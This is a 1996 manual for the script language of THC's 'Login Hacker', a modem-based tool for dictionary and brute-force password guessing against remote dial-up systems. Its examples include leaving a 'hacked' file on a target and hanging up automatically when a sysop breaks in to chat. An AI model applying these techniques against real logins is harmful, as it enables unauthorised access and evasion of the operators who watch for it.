********* * * **** * * * * * ****** * * * * * * * * **** The Hacker's Choice Part I - The Login Hacker (c) 1996 by van Hauser/THC of L.o.r.E. BBS ----------------------------------------------------------------------------- The Script Documentation This is the Login Hacker, the first release of the THC Project of L.o.r.E. --->>> READ THE NORMAL DOCUMENTATION FIRST ! <<<--- For easy targets, you don't need this script language, you can use the menu to select everything you like. But for more difficult targets, you need this : The Login Hacker Script Language. It's very easy to use. It's like any other script language of terminal software but has got special possiblities for hacking. Part I - The Structure everything that begins with a ";" is a comment. everything that begins with a ":" is a jump mark for goto commands Then there are 4 lines that start with a "#" - that marks the beginning of a special part in the script. The first is #DEFINE which is to define the variables. The second is a special one called #NOCARRIER where is automatically jumped to if the carrier gets lost without purpose (the hangup command is on purpose, anything else not ;-) ). The third is the #START where the actual script starts. The #END marks the end of the script. ******************************************************************************* If you get an ERROR when compiling, there's a file named .BAK in the same directory. Look into it and compare the error message with the output there. There are two types of Error Messages produced while compiling : WARNING Messages - important to take a look after that type, but the compiler will compile it anyway. The script MAY run without problems. This type is produced when f.e. the specified dictionary is not found. Maybe you didn't copy it already. ERROR Messages - This is a critical error. The compiler terminates at once. Check the Error message, the .BAK and the original file to correct it. ******************************************************************************* ------------------------------------------------------------------------------- Part II - The Definitions -> #DEFINE In this part you may ONLY declare the value of the variables. All variables are optional EXCEPT the logfile and the phone_nr variable. All variables are discussed in all their possibilties. You may NOT define any other variables of your own here ! #DEFINE LOGFILE=FILENAME The Logfile to which all output is written. ** This is one to the two variable which MUST be used. ** Example : LOGFILE=C:\OUTPUT\NY-SYS5.LOG PHONE_NR=NUMBER The phone_nr variable is used when you use the DIAL command. It may have letters and digits! ** This is the second variable that MUST be used. ** Note : If your modem needs Pulse Dialing, put a "P" in front of the number! Example : PHONE_NR=1-800-WHO-CARES INIT_MODEM=STRING If you need a special modem init string, use this command Don't put the "AT" command in front! If not specified, the standard THC_Login_Hacker Setup entry is used. Example : INIT_MODEM=Z (that would be "AT Z") INIT_DATA=STRING This inits the Datachannel like Parity bit, data bits. stop bits etc. common are 8N1 and 7E1. if not specified the standard THC_Login_Hacker Setup entry is used. It must have those 3 characters. The first may either be 7 or 8, these are the data bits. The second may be P for Parity, E fo Even or N for None Control Bit. The Third specifies if theirs 1 start bit or 2 altogether (1 start + 1 stop bit). 7/8+E/P/N+1/2 DIAL_TRIES=NUMBER This variable declares the maximum numbers of dial attempts the script does. The Number may be between 0-65535. Zero means unlimited connects! If the number is reached a HANGUP follows and a comment is written in the script. NOTE : If NOT specified in the script, the settings from LOGINH.CFG will be used! Example : DIAL_TRIES=3 Standard : 0 LOGIN_TRIES=NUMBER This variable declares the maximum numbers of login tries the script does. It may be between 0-2300000000. Zero means unlimited. Note that if a dictionary file reaches EOF, the script automatically hangs up and terminates. A Login is counted as a long try if the dictionary most used does a SEND_NEXT_DIC or NEXT_DIC command or the same with the BRUTE. NOTE : If NOT specified in the script, the settings from LOGINH.CFG will be used! Example : LOGIN_TRIES=0 Standard : 0 DIC(NUMBER)=FILENAME Specify a dictionary to use in the script. DIC are pointers to Dictionary files. You may have up to 3 dictionaries, from DIC(1) to DIC(3). With the commands Send_Next_DIC(1), Send_DIC(1), and Next_DIC(1) you can use it. but more on how to use this later. Example : DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC FROM_DIC(NUMBER)=STRING This defines from which word up the dictionary is used. Example : FROM_DIC(1)=Tracy This example sends every word from "Tracy" on in the specified dictionary number 1 BRUTE(NUMBER)=STRING,NUMBER,NUMBER,NUMBER Specify a brute force generator to use in the script Now for the hardcore thing of this program : The brute force option. It's very flexible as you will soon see. The options for the BRUTE variable are divided into 4 parts, each seperated by a ",". (1)The first tells what is used for brute force: a=lowercase A=Uppercase 1=numbers $=special chars ^=Control Characters A1$ would be Upper, numbers and special chars ALL is a synonymous for the WHOLE ascii table! (2)The second one tells how many different types must be there to be a valid choice. "types" means the charsets of (1). A value of 1 means EVERY generated word is Okay while a value of 2 there must be at f.e. one Upcase and one number in the generated word to be valid. (A value of 0 is not possible) (3)The third tells the minimum length of a valid BF password. (4)The fourth the maximum length. NOTE : Minimum length is 1 - Maximum length is 12 ! And again you may have up to 3 brute force generators. (BRUTE(2) etc.) and if one reaches the end the script finishs. Commands to use later are : Next_Brute(1), Send_Next_Brute(1), Send_Brute(1) Example : BRUTE(1)=a,1,1,6 This example inits the brute force generator number 1 with the following data : * lower case letters only * at least one type of char set must be present in a valid brute generated word (at least "1" means everyone will do) * Minimum length of a valid word is 1 * Maximum length of a valid word is 6 FROM_BRUTE(number)=STRING This starts the brute force generator with this initalisation. If started with a 4 letter digit and you scan 1-8 digits, 1-3 digits won't be checked. The entry is generated increasingly from the right. that means : first aaaa, then aaab, then aaac etc. Example : FROM_BRUTE(1)=2527 ------------------------------------------------------------------------------- PART III - The #NOCARRIER Section As said before, this is the point which is executed when you loose the carrier and didn't use the HANGUP command. NOTE that it will terminate the script when you don't end this part with a GOTO(#START) or GOTO(1) etc. !! The DIAL_TRIES setting ISN'T checked here. ... remember you need to dial again to the system. I don't tell you the commands here ... look in the #START section. #NOCARRIER ------------------------------------------------------------------------------- PART IV - The #START Section This is where you program the algorythm to hack a system. Every command is presented here ... so read carefully ! #START LOG(STRING) With the LOG() command you write something into the logfile. It can be any text, variables MUST have a "$" sign in front of them and MUST have spaces around it or "(" or ")" ! Every LOG command automatically prints ENTER at the end. Example : LOG(Beginning on $DATE * $TIME) this prints "Beginning on 24-12-95 * 23:00" LOG_(STRING) same as above but doesn't writes CRLF (End-Of-Line) after the text. :NUMBER every line that begins with a ":" is a GOTO Marking. It can only be a number ! You may have up to 240 markings (only with the numbers 1 to 240 ... no others) You may jump to such a marking with the GOTO, GOSUB, CHECK4OUTPUT and CHECK4CARRIER commands. Example : :1 this specifies the jump point number 1 on this line GOTO(NUMBER) This jumpt to the specified Jump Marking. You may also jump to #START, #NOCARRIER and #END Example : GOTO(#END) (this terminates the script) GOSUB(NUMBER) With the GOSUB Command you jump to one goto marking. It will execute normally after that; it will jump back to the point the GOSUB command was executed when a RETURN command is encountered. Can't be GOSUB(#END) ! Example : GOSUB(4) RETURN Returns to the location of the last gosub command executed and continues normally. If a return command is encountered without a Gosub start adress in the buffer, it will be ignored. You may have as many as 255 gosubs in buffer. Example : RETURN CHECK4CARRIER(NUMBER) Checks the modem if it has got a carrier connect. If NOT it jumps to the specified goto marking. If YES it sets the internal connect variable to TRUE to check for NO_CARRIERS You may also jump to #NOCARRIER, #START and #END. It is also possible to just turn the checking ON or OFF. If Check4Carrier(ON) is done instead of check4carrier with a jump marking it does a carrier detector check and if NOT presents jump to #NoCarrier This command is useful ONLY when you first turn CHECK4CARRIER(OFF) or you don't use the DIAL command to connect to your target (f.e. let the SCAVENGER DIALER do this.) Examples : CHECK4CARRIER(#NOCARRIER) CHECK4CARRIER(5) CHECK4CARRIER(ON) CHECK4CARRIER(OFF) CHECK4OUTPUT(NUMBER) Like the ALARM Function below : If OUTPUT from the modem is detected it immedeantly jumps to this specified jump marking. You may also jump to #NOCARRIER, #START and #END. It is also possible to just turn the checking OFF (so disable a specified output checking) Examples : CHECK4CARRIER(#NOCARRIER) CHECK4CARRIER(5) CHECK4CARRIER(OFF) DIAL This Dials the number specified in PHONE_NR. If it is still connected to a system it hangs up first. Example : DIAL HANGUP Hangs up/drops the carrier, etc. Example : HANGUP WAIT4STRING(NUMBER,STRING,NUMBER,COMMAND,STRING) Now thats the most important command in this script language. It waits for a special word in the modemoutput. If it is encountered, the script continues, if not, after the timeout, a specified string is send to the modem and after a specified number of timeouts, a command may be executed. NOTE: First WAIT4STRING checks if in the CURRENT line is the word present. If not it waits for it. The Syntax : WAIT4STRING(a,b,c,d,e) a : How many seconds, after it will be an timeout. (0-255) 0=unlimited (waits until TOTAL TIMEOUT - the script will jump to #NOCARRIER if no data comes from modem after 5 minutes ! - if nothing gets through OR the string is detected in the datastream at any time OR carrier gets lost b : The string that will be send to the modem after a timeout c : After how many total timeouts the failure command will be executed. 0=never, 1=first time, <=255 d : The special failure action command. It may be ANY (or none) command EXCEPT : ALARM, WAIT4STRING, IF e : The String to wait for ! (Case sensitive!) Example : WAIT4STRING(15,^M,2,GOTO(1),ogin:) In this example it waits for string "ogin:" for 15 seconds, and if not encountered, if sends a carriage return to the modem (^M), then waits again for 15s, and if "ogin:" is again not encountered, ^M is send again and after the next 15s the FAILURE command is triggered, which means GOTO jump mark no. 1 LOG_SESSION_ON From this point up, anything send from the modem is written to the logfile Example : LOG_SESSION_ON LOG_SESSION_OFF if writing screenoutput to log was active, it isn't any more to this point. Example : LOG_SESSION_OFF SEND(STRING) The SEND command sends a string to the modem. You may here also send variables with a "$". It sends an ENTER (Carriage Return) at the end. If no String is specified, it just prints an ENTER. Example : SEND(echo Hacked you system Time : $TIME - Date : $DATE > HACKED.TXT) this sends "echo HAcked your system Time : 23:00 - Date : 24-12-95 > HACKED.TXT" SEND_() Same as above but doesn't sends the ^M character (ENTER) at the end. Useful if you just need to enter one character or want to enter the modem command mode with +++ Examples : SEND_(n) SEND_(+++) SEND_NEXT_DIC(NUMBER) This moves forward the pointer on the current word in the dictionary and sends it to modem. Example : SEND_NEXT_DIC(1) SEND_DIC(NUMBER) This sends the current dictionary word to modem. Example : SEND_DIC(1) NEXT_DIC(NUMBER) This moves forward the pointer on the current word in the dictionary. Example : NEXT_DIC(1) SEND_NEXT_BRUTE(NUMBER) This generates the next valid brute force string and prints it to modem. Example : SEND_NEXT_BRUTE(1) SEND_BRUTE(NUMBER) This prints the current valid brute force string to modem. Example : SEND_BRUTE(1) NEXT_BRUTE(NUMBER) This generates the next valid brute force string. Example : NEXT_BRUTE(1) IF VARIABLE OPERATOR STRING THEN COMMAND The IF command isn't very flexible by now ... tell me what you need and it will be in the next version. SYNTAX : IF THEN may be anything which is mentioned in PART VI may be "=" if it must be equal, "<" or ">" for greater and smaller and "~" if the variable contains the string may be any word. for "<" or ">", variable and string must be digit variables ! this command is executed when the condition is TRUE. Look at the Command Listing for WAIT4STRING to look up what you can use. Example : IF STRING~ogin THEN GOTO(3) IF the CURRENT LINE(STRING) CONTAINS(~) the string "ogin" in it THEN goto jump mark no. 3 EXECUTE(STRING) Executes a DOS Program. after the executen it continues the script. You MAY include variables in the execution line. You may execute internal MsDos commands. Remember to put an "$" sign in front of variables and only spaces or "(" and ")" in front/back. WARNING : If you want to execute programs while connected in the script you MUST use a fossil driver or the computer will lock up! (Has got something to do with the interrupts ...) Use X00.EXE E 2 before running LOGIN HACKER Note:If the program to exexute is in your PATH enviroment it will be found ... but better safe then sorry ;-) Example : EXECUTE(C:\SB\VPLAY C:\SB\VOC\HACKED.VOC) EXECUTE(COPY $LOGFILE C:\HACKED) ALARM(STRING,COMMAND) If a special string from the modem is encountered at a point, this will trigger this special command. If a Alarm is set, it will be active until it is disabled with the command ALARM() or a new ALARM string or command is specified. The Syntax ; ALARM(string,command) or ALARM(). STRING : is the string for which is search in the data which is send from the modem. COMMAND: is the command to execute when encountered. Look at the Command Listing for WAIT4STRING to look up what you can use. Useful for example if you wanna hack a BBS where the SYSOP could break in for a chat to ask for your doing. With this command you could automatically hangup and terminate the script. Example : ALARM(chat,GOTO(#END)) SET VARIABLE=STRING With this command you can define a variable in the #START or #NOCARRIER section. If a variable is a digit you may only set it to a digit. You may set the following variables: STRING, DIAL_TRIED, LOGIN_TRIED, S_TMP, D_TMP Example : SET D_TMP=3 This sets the digit variable D_TMP to 3 INC(DIGIT_VARIABLE) Increases the specified digit variable by 1. Will only do the command if the variable won't be out of the specified range after the addition. Valid for : DIAL_TRIES, DIAL_TRIED, LOGIN_TRIES, LOGIN_TRIED and D_TMP Example : INC(D_TMP) DEC(DIGIT_VARIABLE) Decreases the specified digit variable by 1. Will only do the command if the variable won't be out of the specified range after the subtraction. Valid for : DIAL_TRIES, DIAL_TRIED, LOGIN_TRIES, LOGIN_TRIED and D_TMP Example : DEC(D_TMP) WAIT(NUMBER) Waits until the specifies seconds have passed. NUMBER must be between 1-255. Example : WAIT(10) WAIT_(NUMBER) Waits until the specifies milliseconds have passed. NUMBER must be between 1-65535. Example : WAIT(500) (a half second) BEEP It makes a BEEP ! Cool eh? ;-) #END ------------------------------------------------------------------------------- PART VI - Variables and Control Characters Now I tell you all the variables that can be used for a SEND() or LOG() command, and which additional variables you have got here. As we said before, to print a variable to modem or logfile you must write a "$" in front of it and there must be spaces around it. Variables you can use are : - any of the specified in #DEFINE - but only the ones defined! - STRING which is the last LINE sended from the modem - STRING2 has got the last 250 chars sended from modem. - DIAL_TRIED the actual tries to dial to the number - LOGIN_TRIED the actual tries to login - TIME the actual time in hoursminutes (without ":" !) Example : TIME=1505 means 15:05 (3.05pm) if minutes are below 10 you must write a zero before it. - DATE the actual date (in the format MMDD) Example : DATE=503 means the 3th may if a day is below 10 you must wrte a zero before it. - DIC(1) the actual entry of the dictionary 1 - BRUTE(2) the actual string of the brute force generator 2 - S_TMP a string variable you can use as you like - D_TMP a digit variable you can use as you like For the IF and SET command : you may only use these variables above, NOT the ones in #DEFINE (where should be the logic? Those are static, constants, you don't have to check them with IF !). Don't need the use the $ in front of a variable here. This is only for SEND, LOG, WAIT4STRING where you need the $ sign ... Examples : IF TIME>1215 THEN GOTO #END (if it's after 12:15 it exits) LOG($DIC(3)) SEND($S_TMP) Now for special characters. You may write any CONTROL characters with the LOG, SEND, or WAIT4STRING command with the "^" sign, proceded by the letter of the control character. ENTER would be ^M. to print a normal "^", you must write "^^" ... okay ? You may use from ^A to ^Z plus ^[ ^\ ^] and ^^ Examples : SEND_(^D) ------------------------------------------------------------------------------- #DEFINE #NOCARRIER #START #END ------------------------------------------------------------------------------- For suggestions or bug report, call L.o.r.E. BBS ++49-(0)69-823282 Login : THC Password : THC to write a comment to sysop, leech any THC release or get one of the things this board is distributor, for example the SCAVENGER Dialer, VLAD Magazine etc. Call ARRESTED DEVELOPMENT (see THC.NFO for number) ans write to van Hauser OR write me an email ... adress + public pgp key below. ------------------------------------------------------------------------------- van Hauser's Public Key Block for vh@campus.de : van Hauser/THC L.o.r.E. BBS -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.1 mQCNAzB6PNQAAAEEALx5p2jI/2rNF9tYandxctI6jP+ZJUcGPTs7QTFtF2c+zK9H ElFfvsC0QkaaUJjyTq7TyII18Na1IuGj2duIHTtG1DTDOnbnZzIRsXndfjCIz5p+ Dt6UYhotbJhCQKkxuIT5F8EZpLTAL88WqaMZJ155uvSTb9uk58pv3AI7GIx9AAUT tBp2YW4gSGF1c2VyL1RIQyBvZiBMT1JFIEJCUw== =6UhL -----END PGP PUBLIC KEY BLOCK-----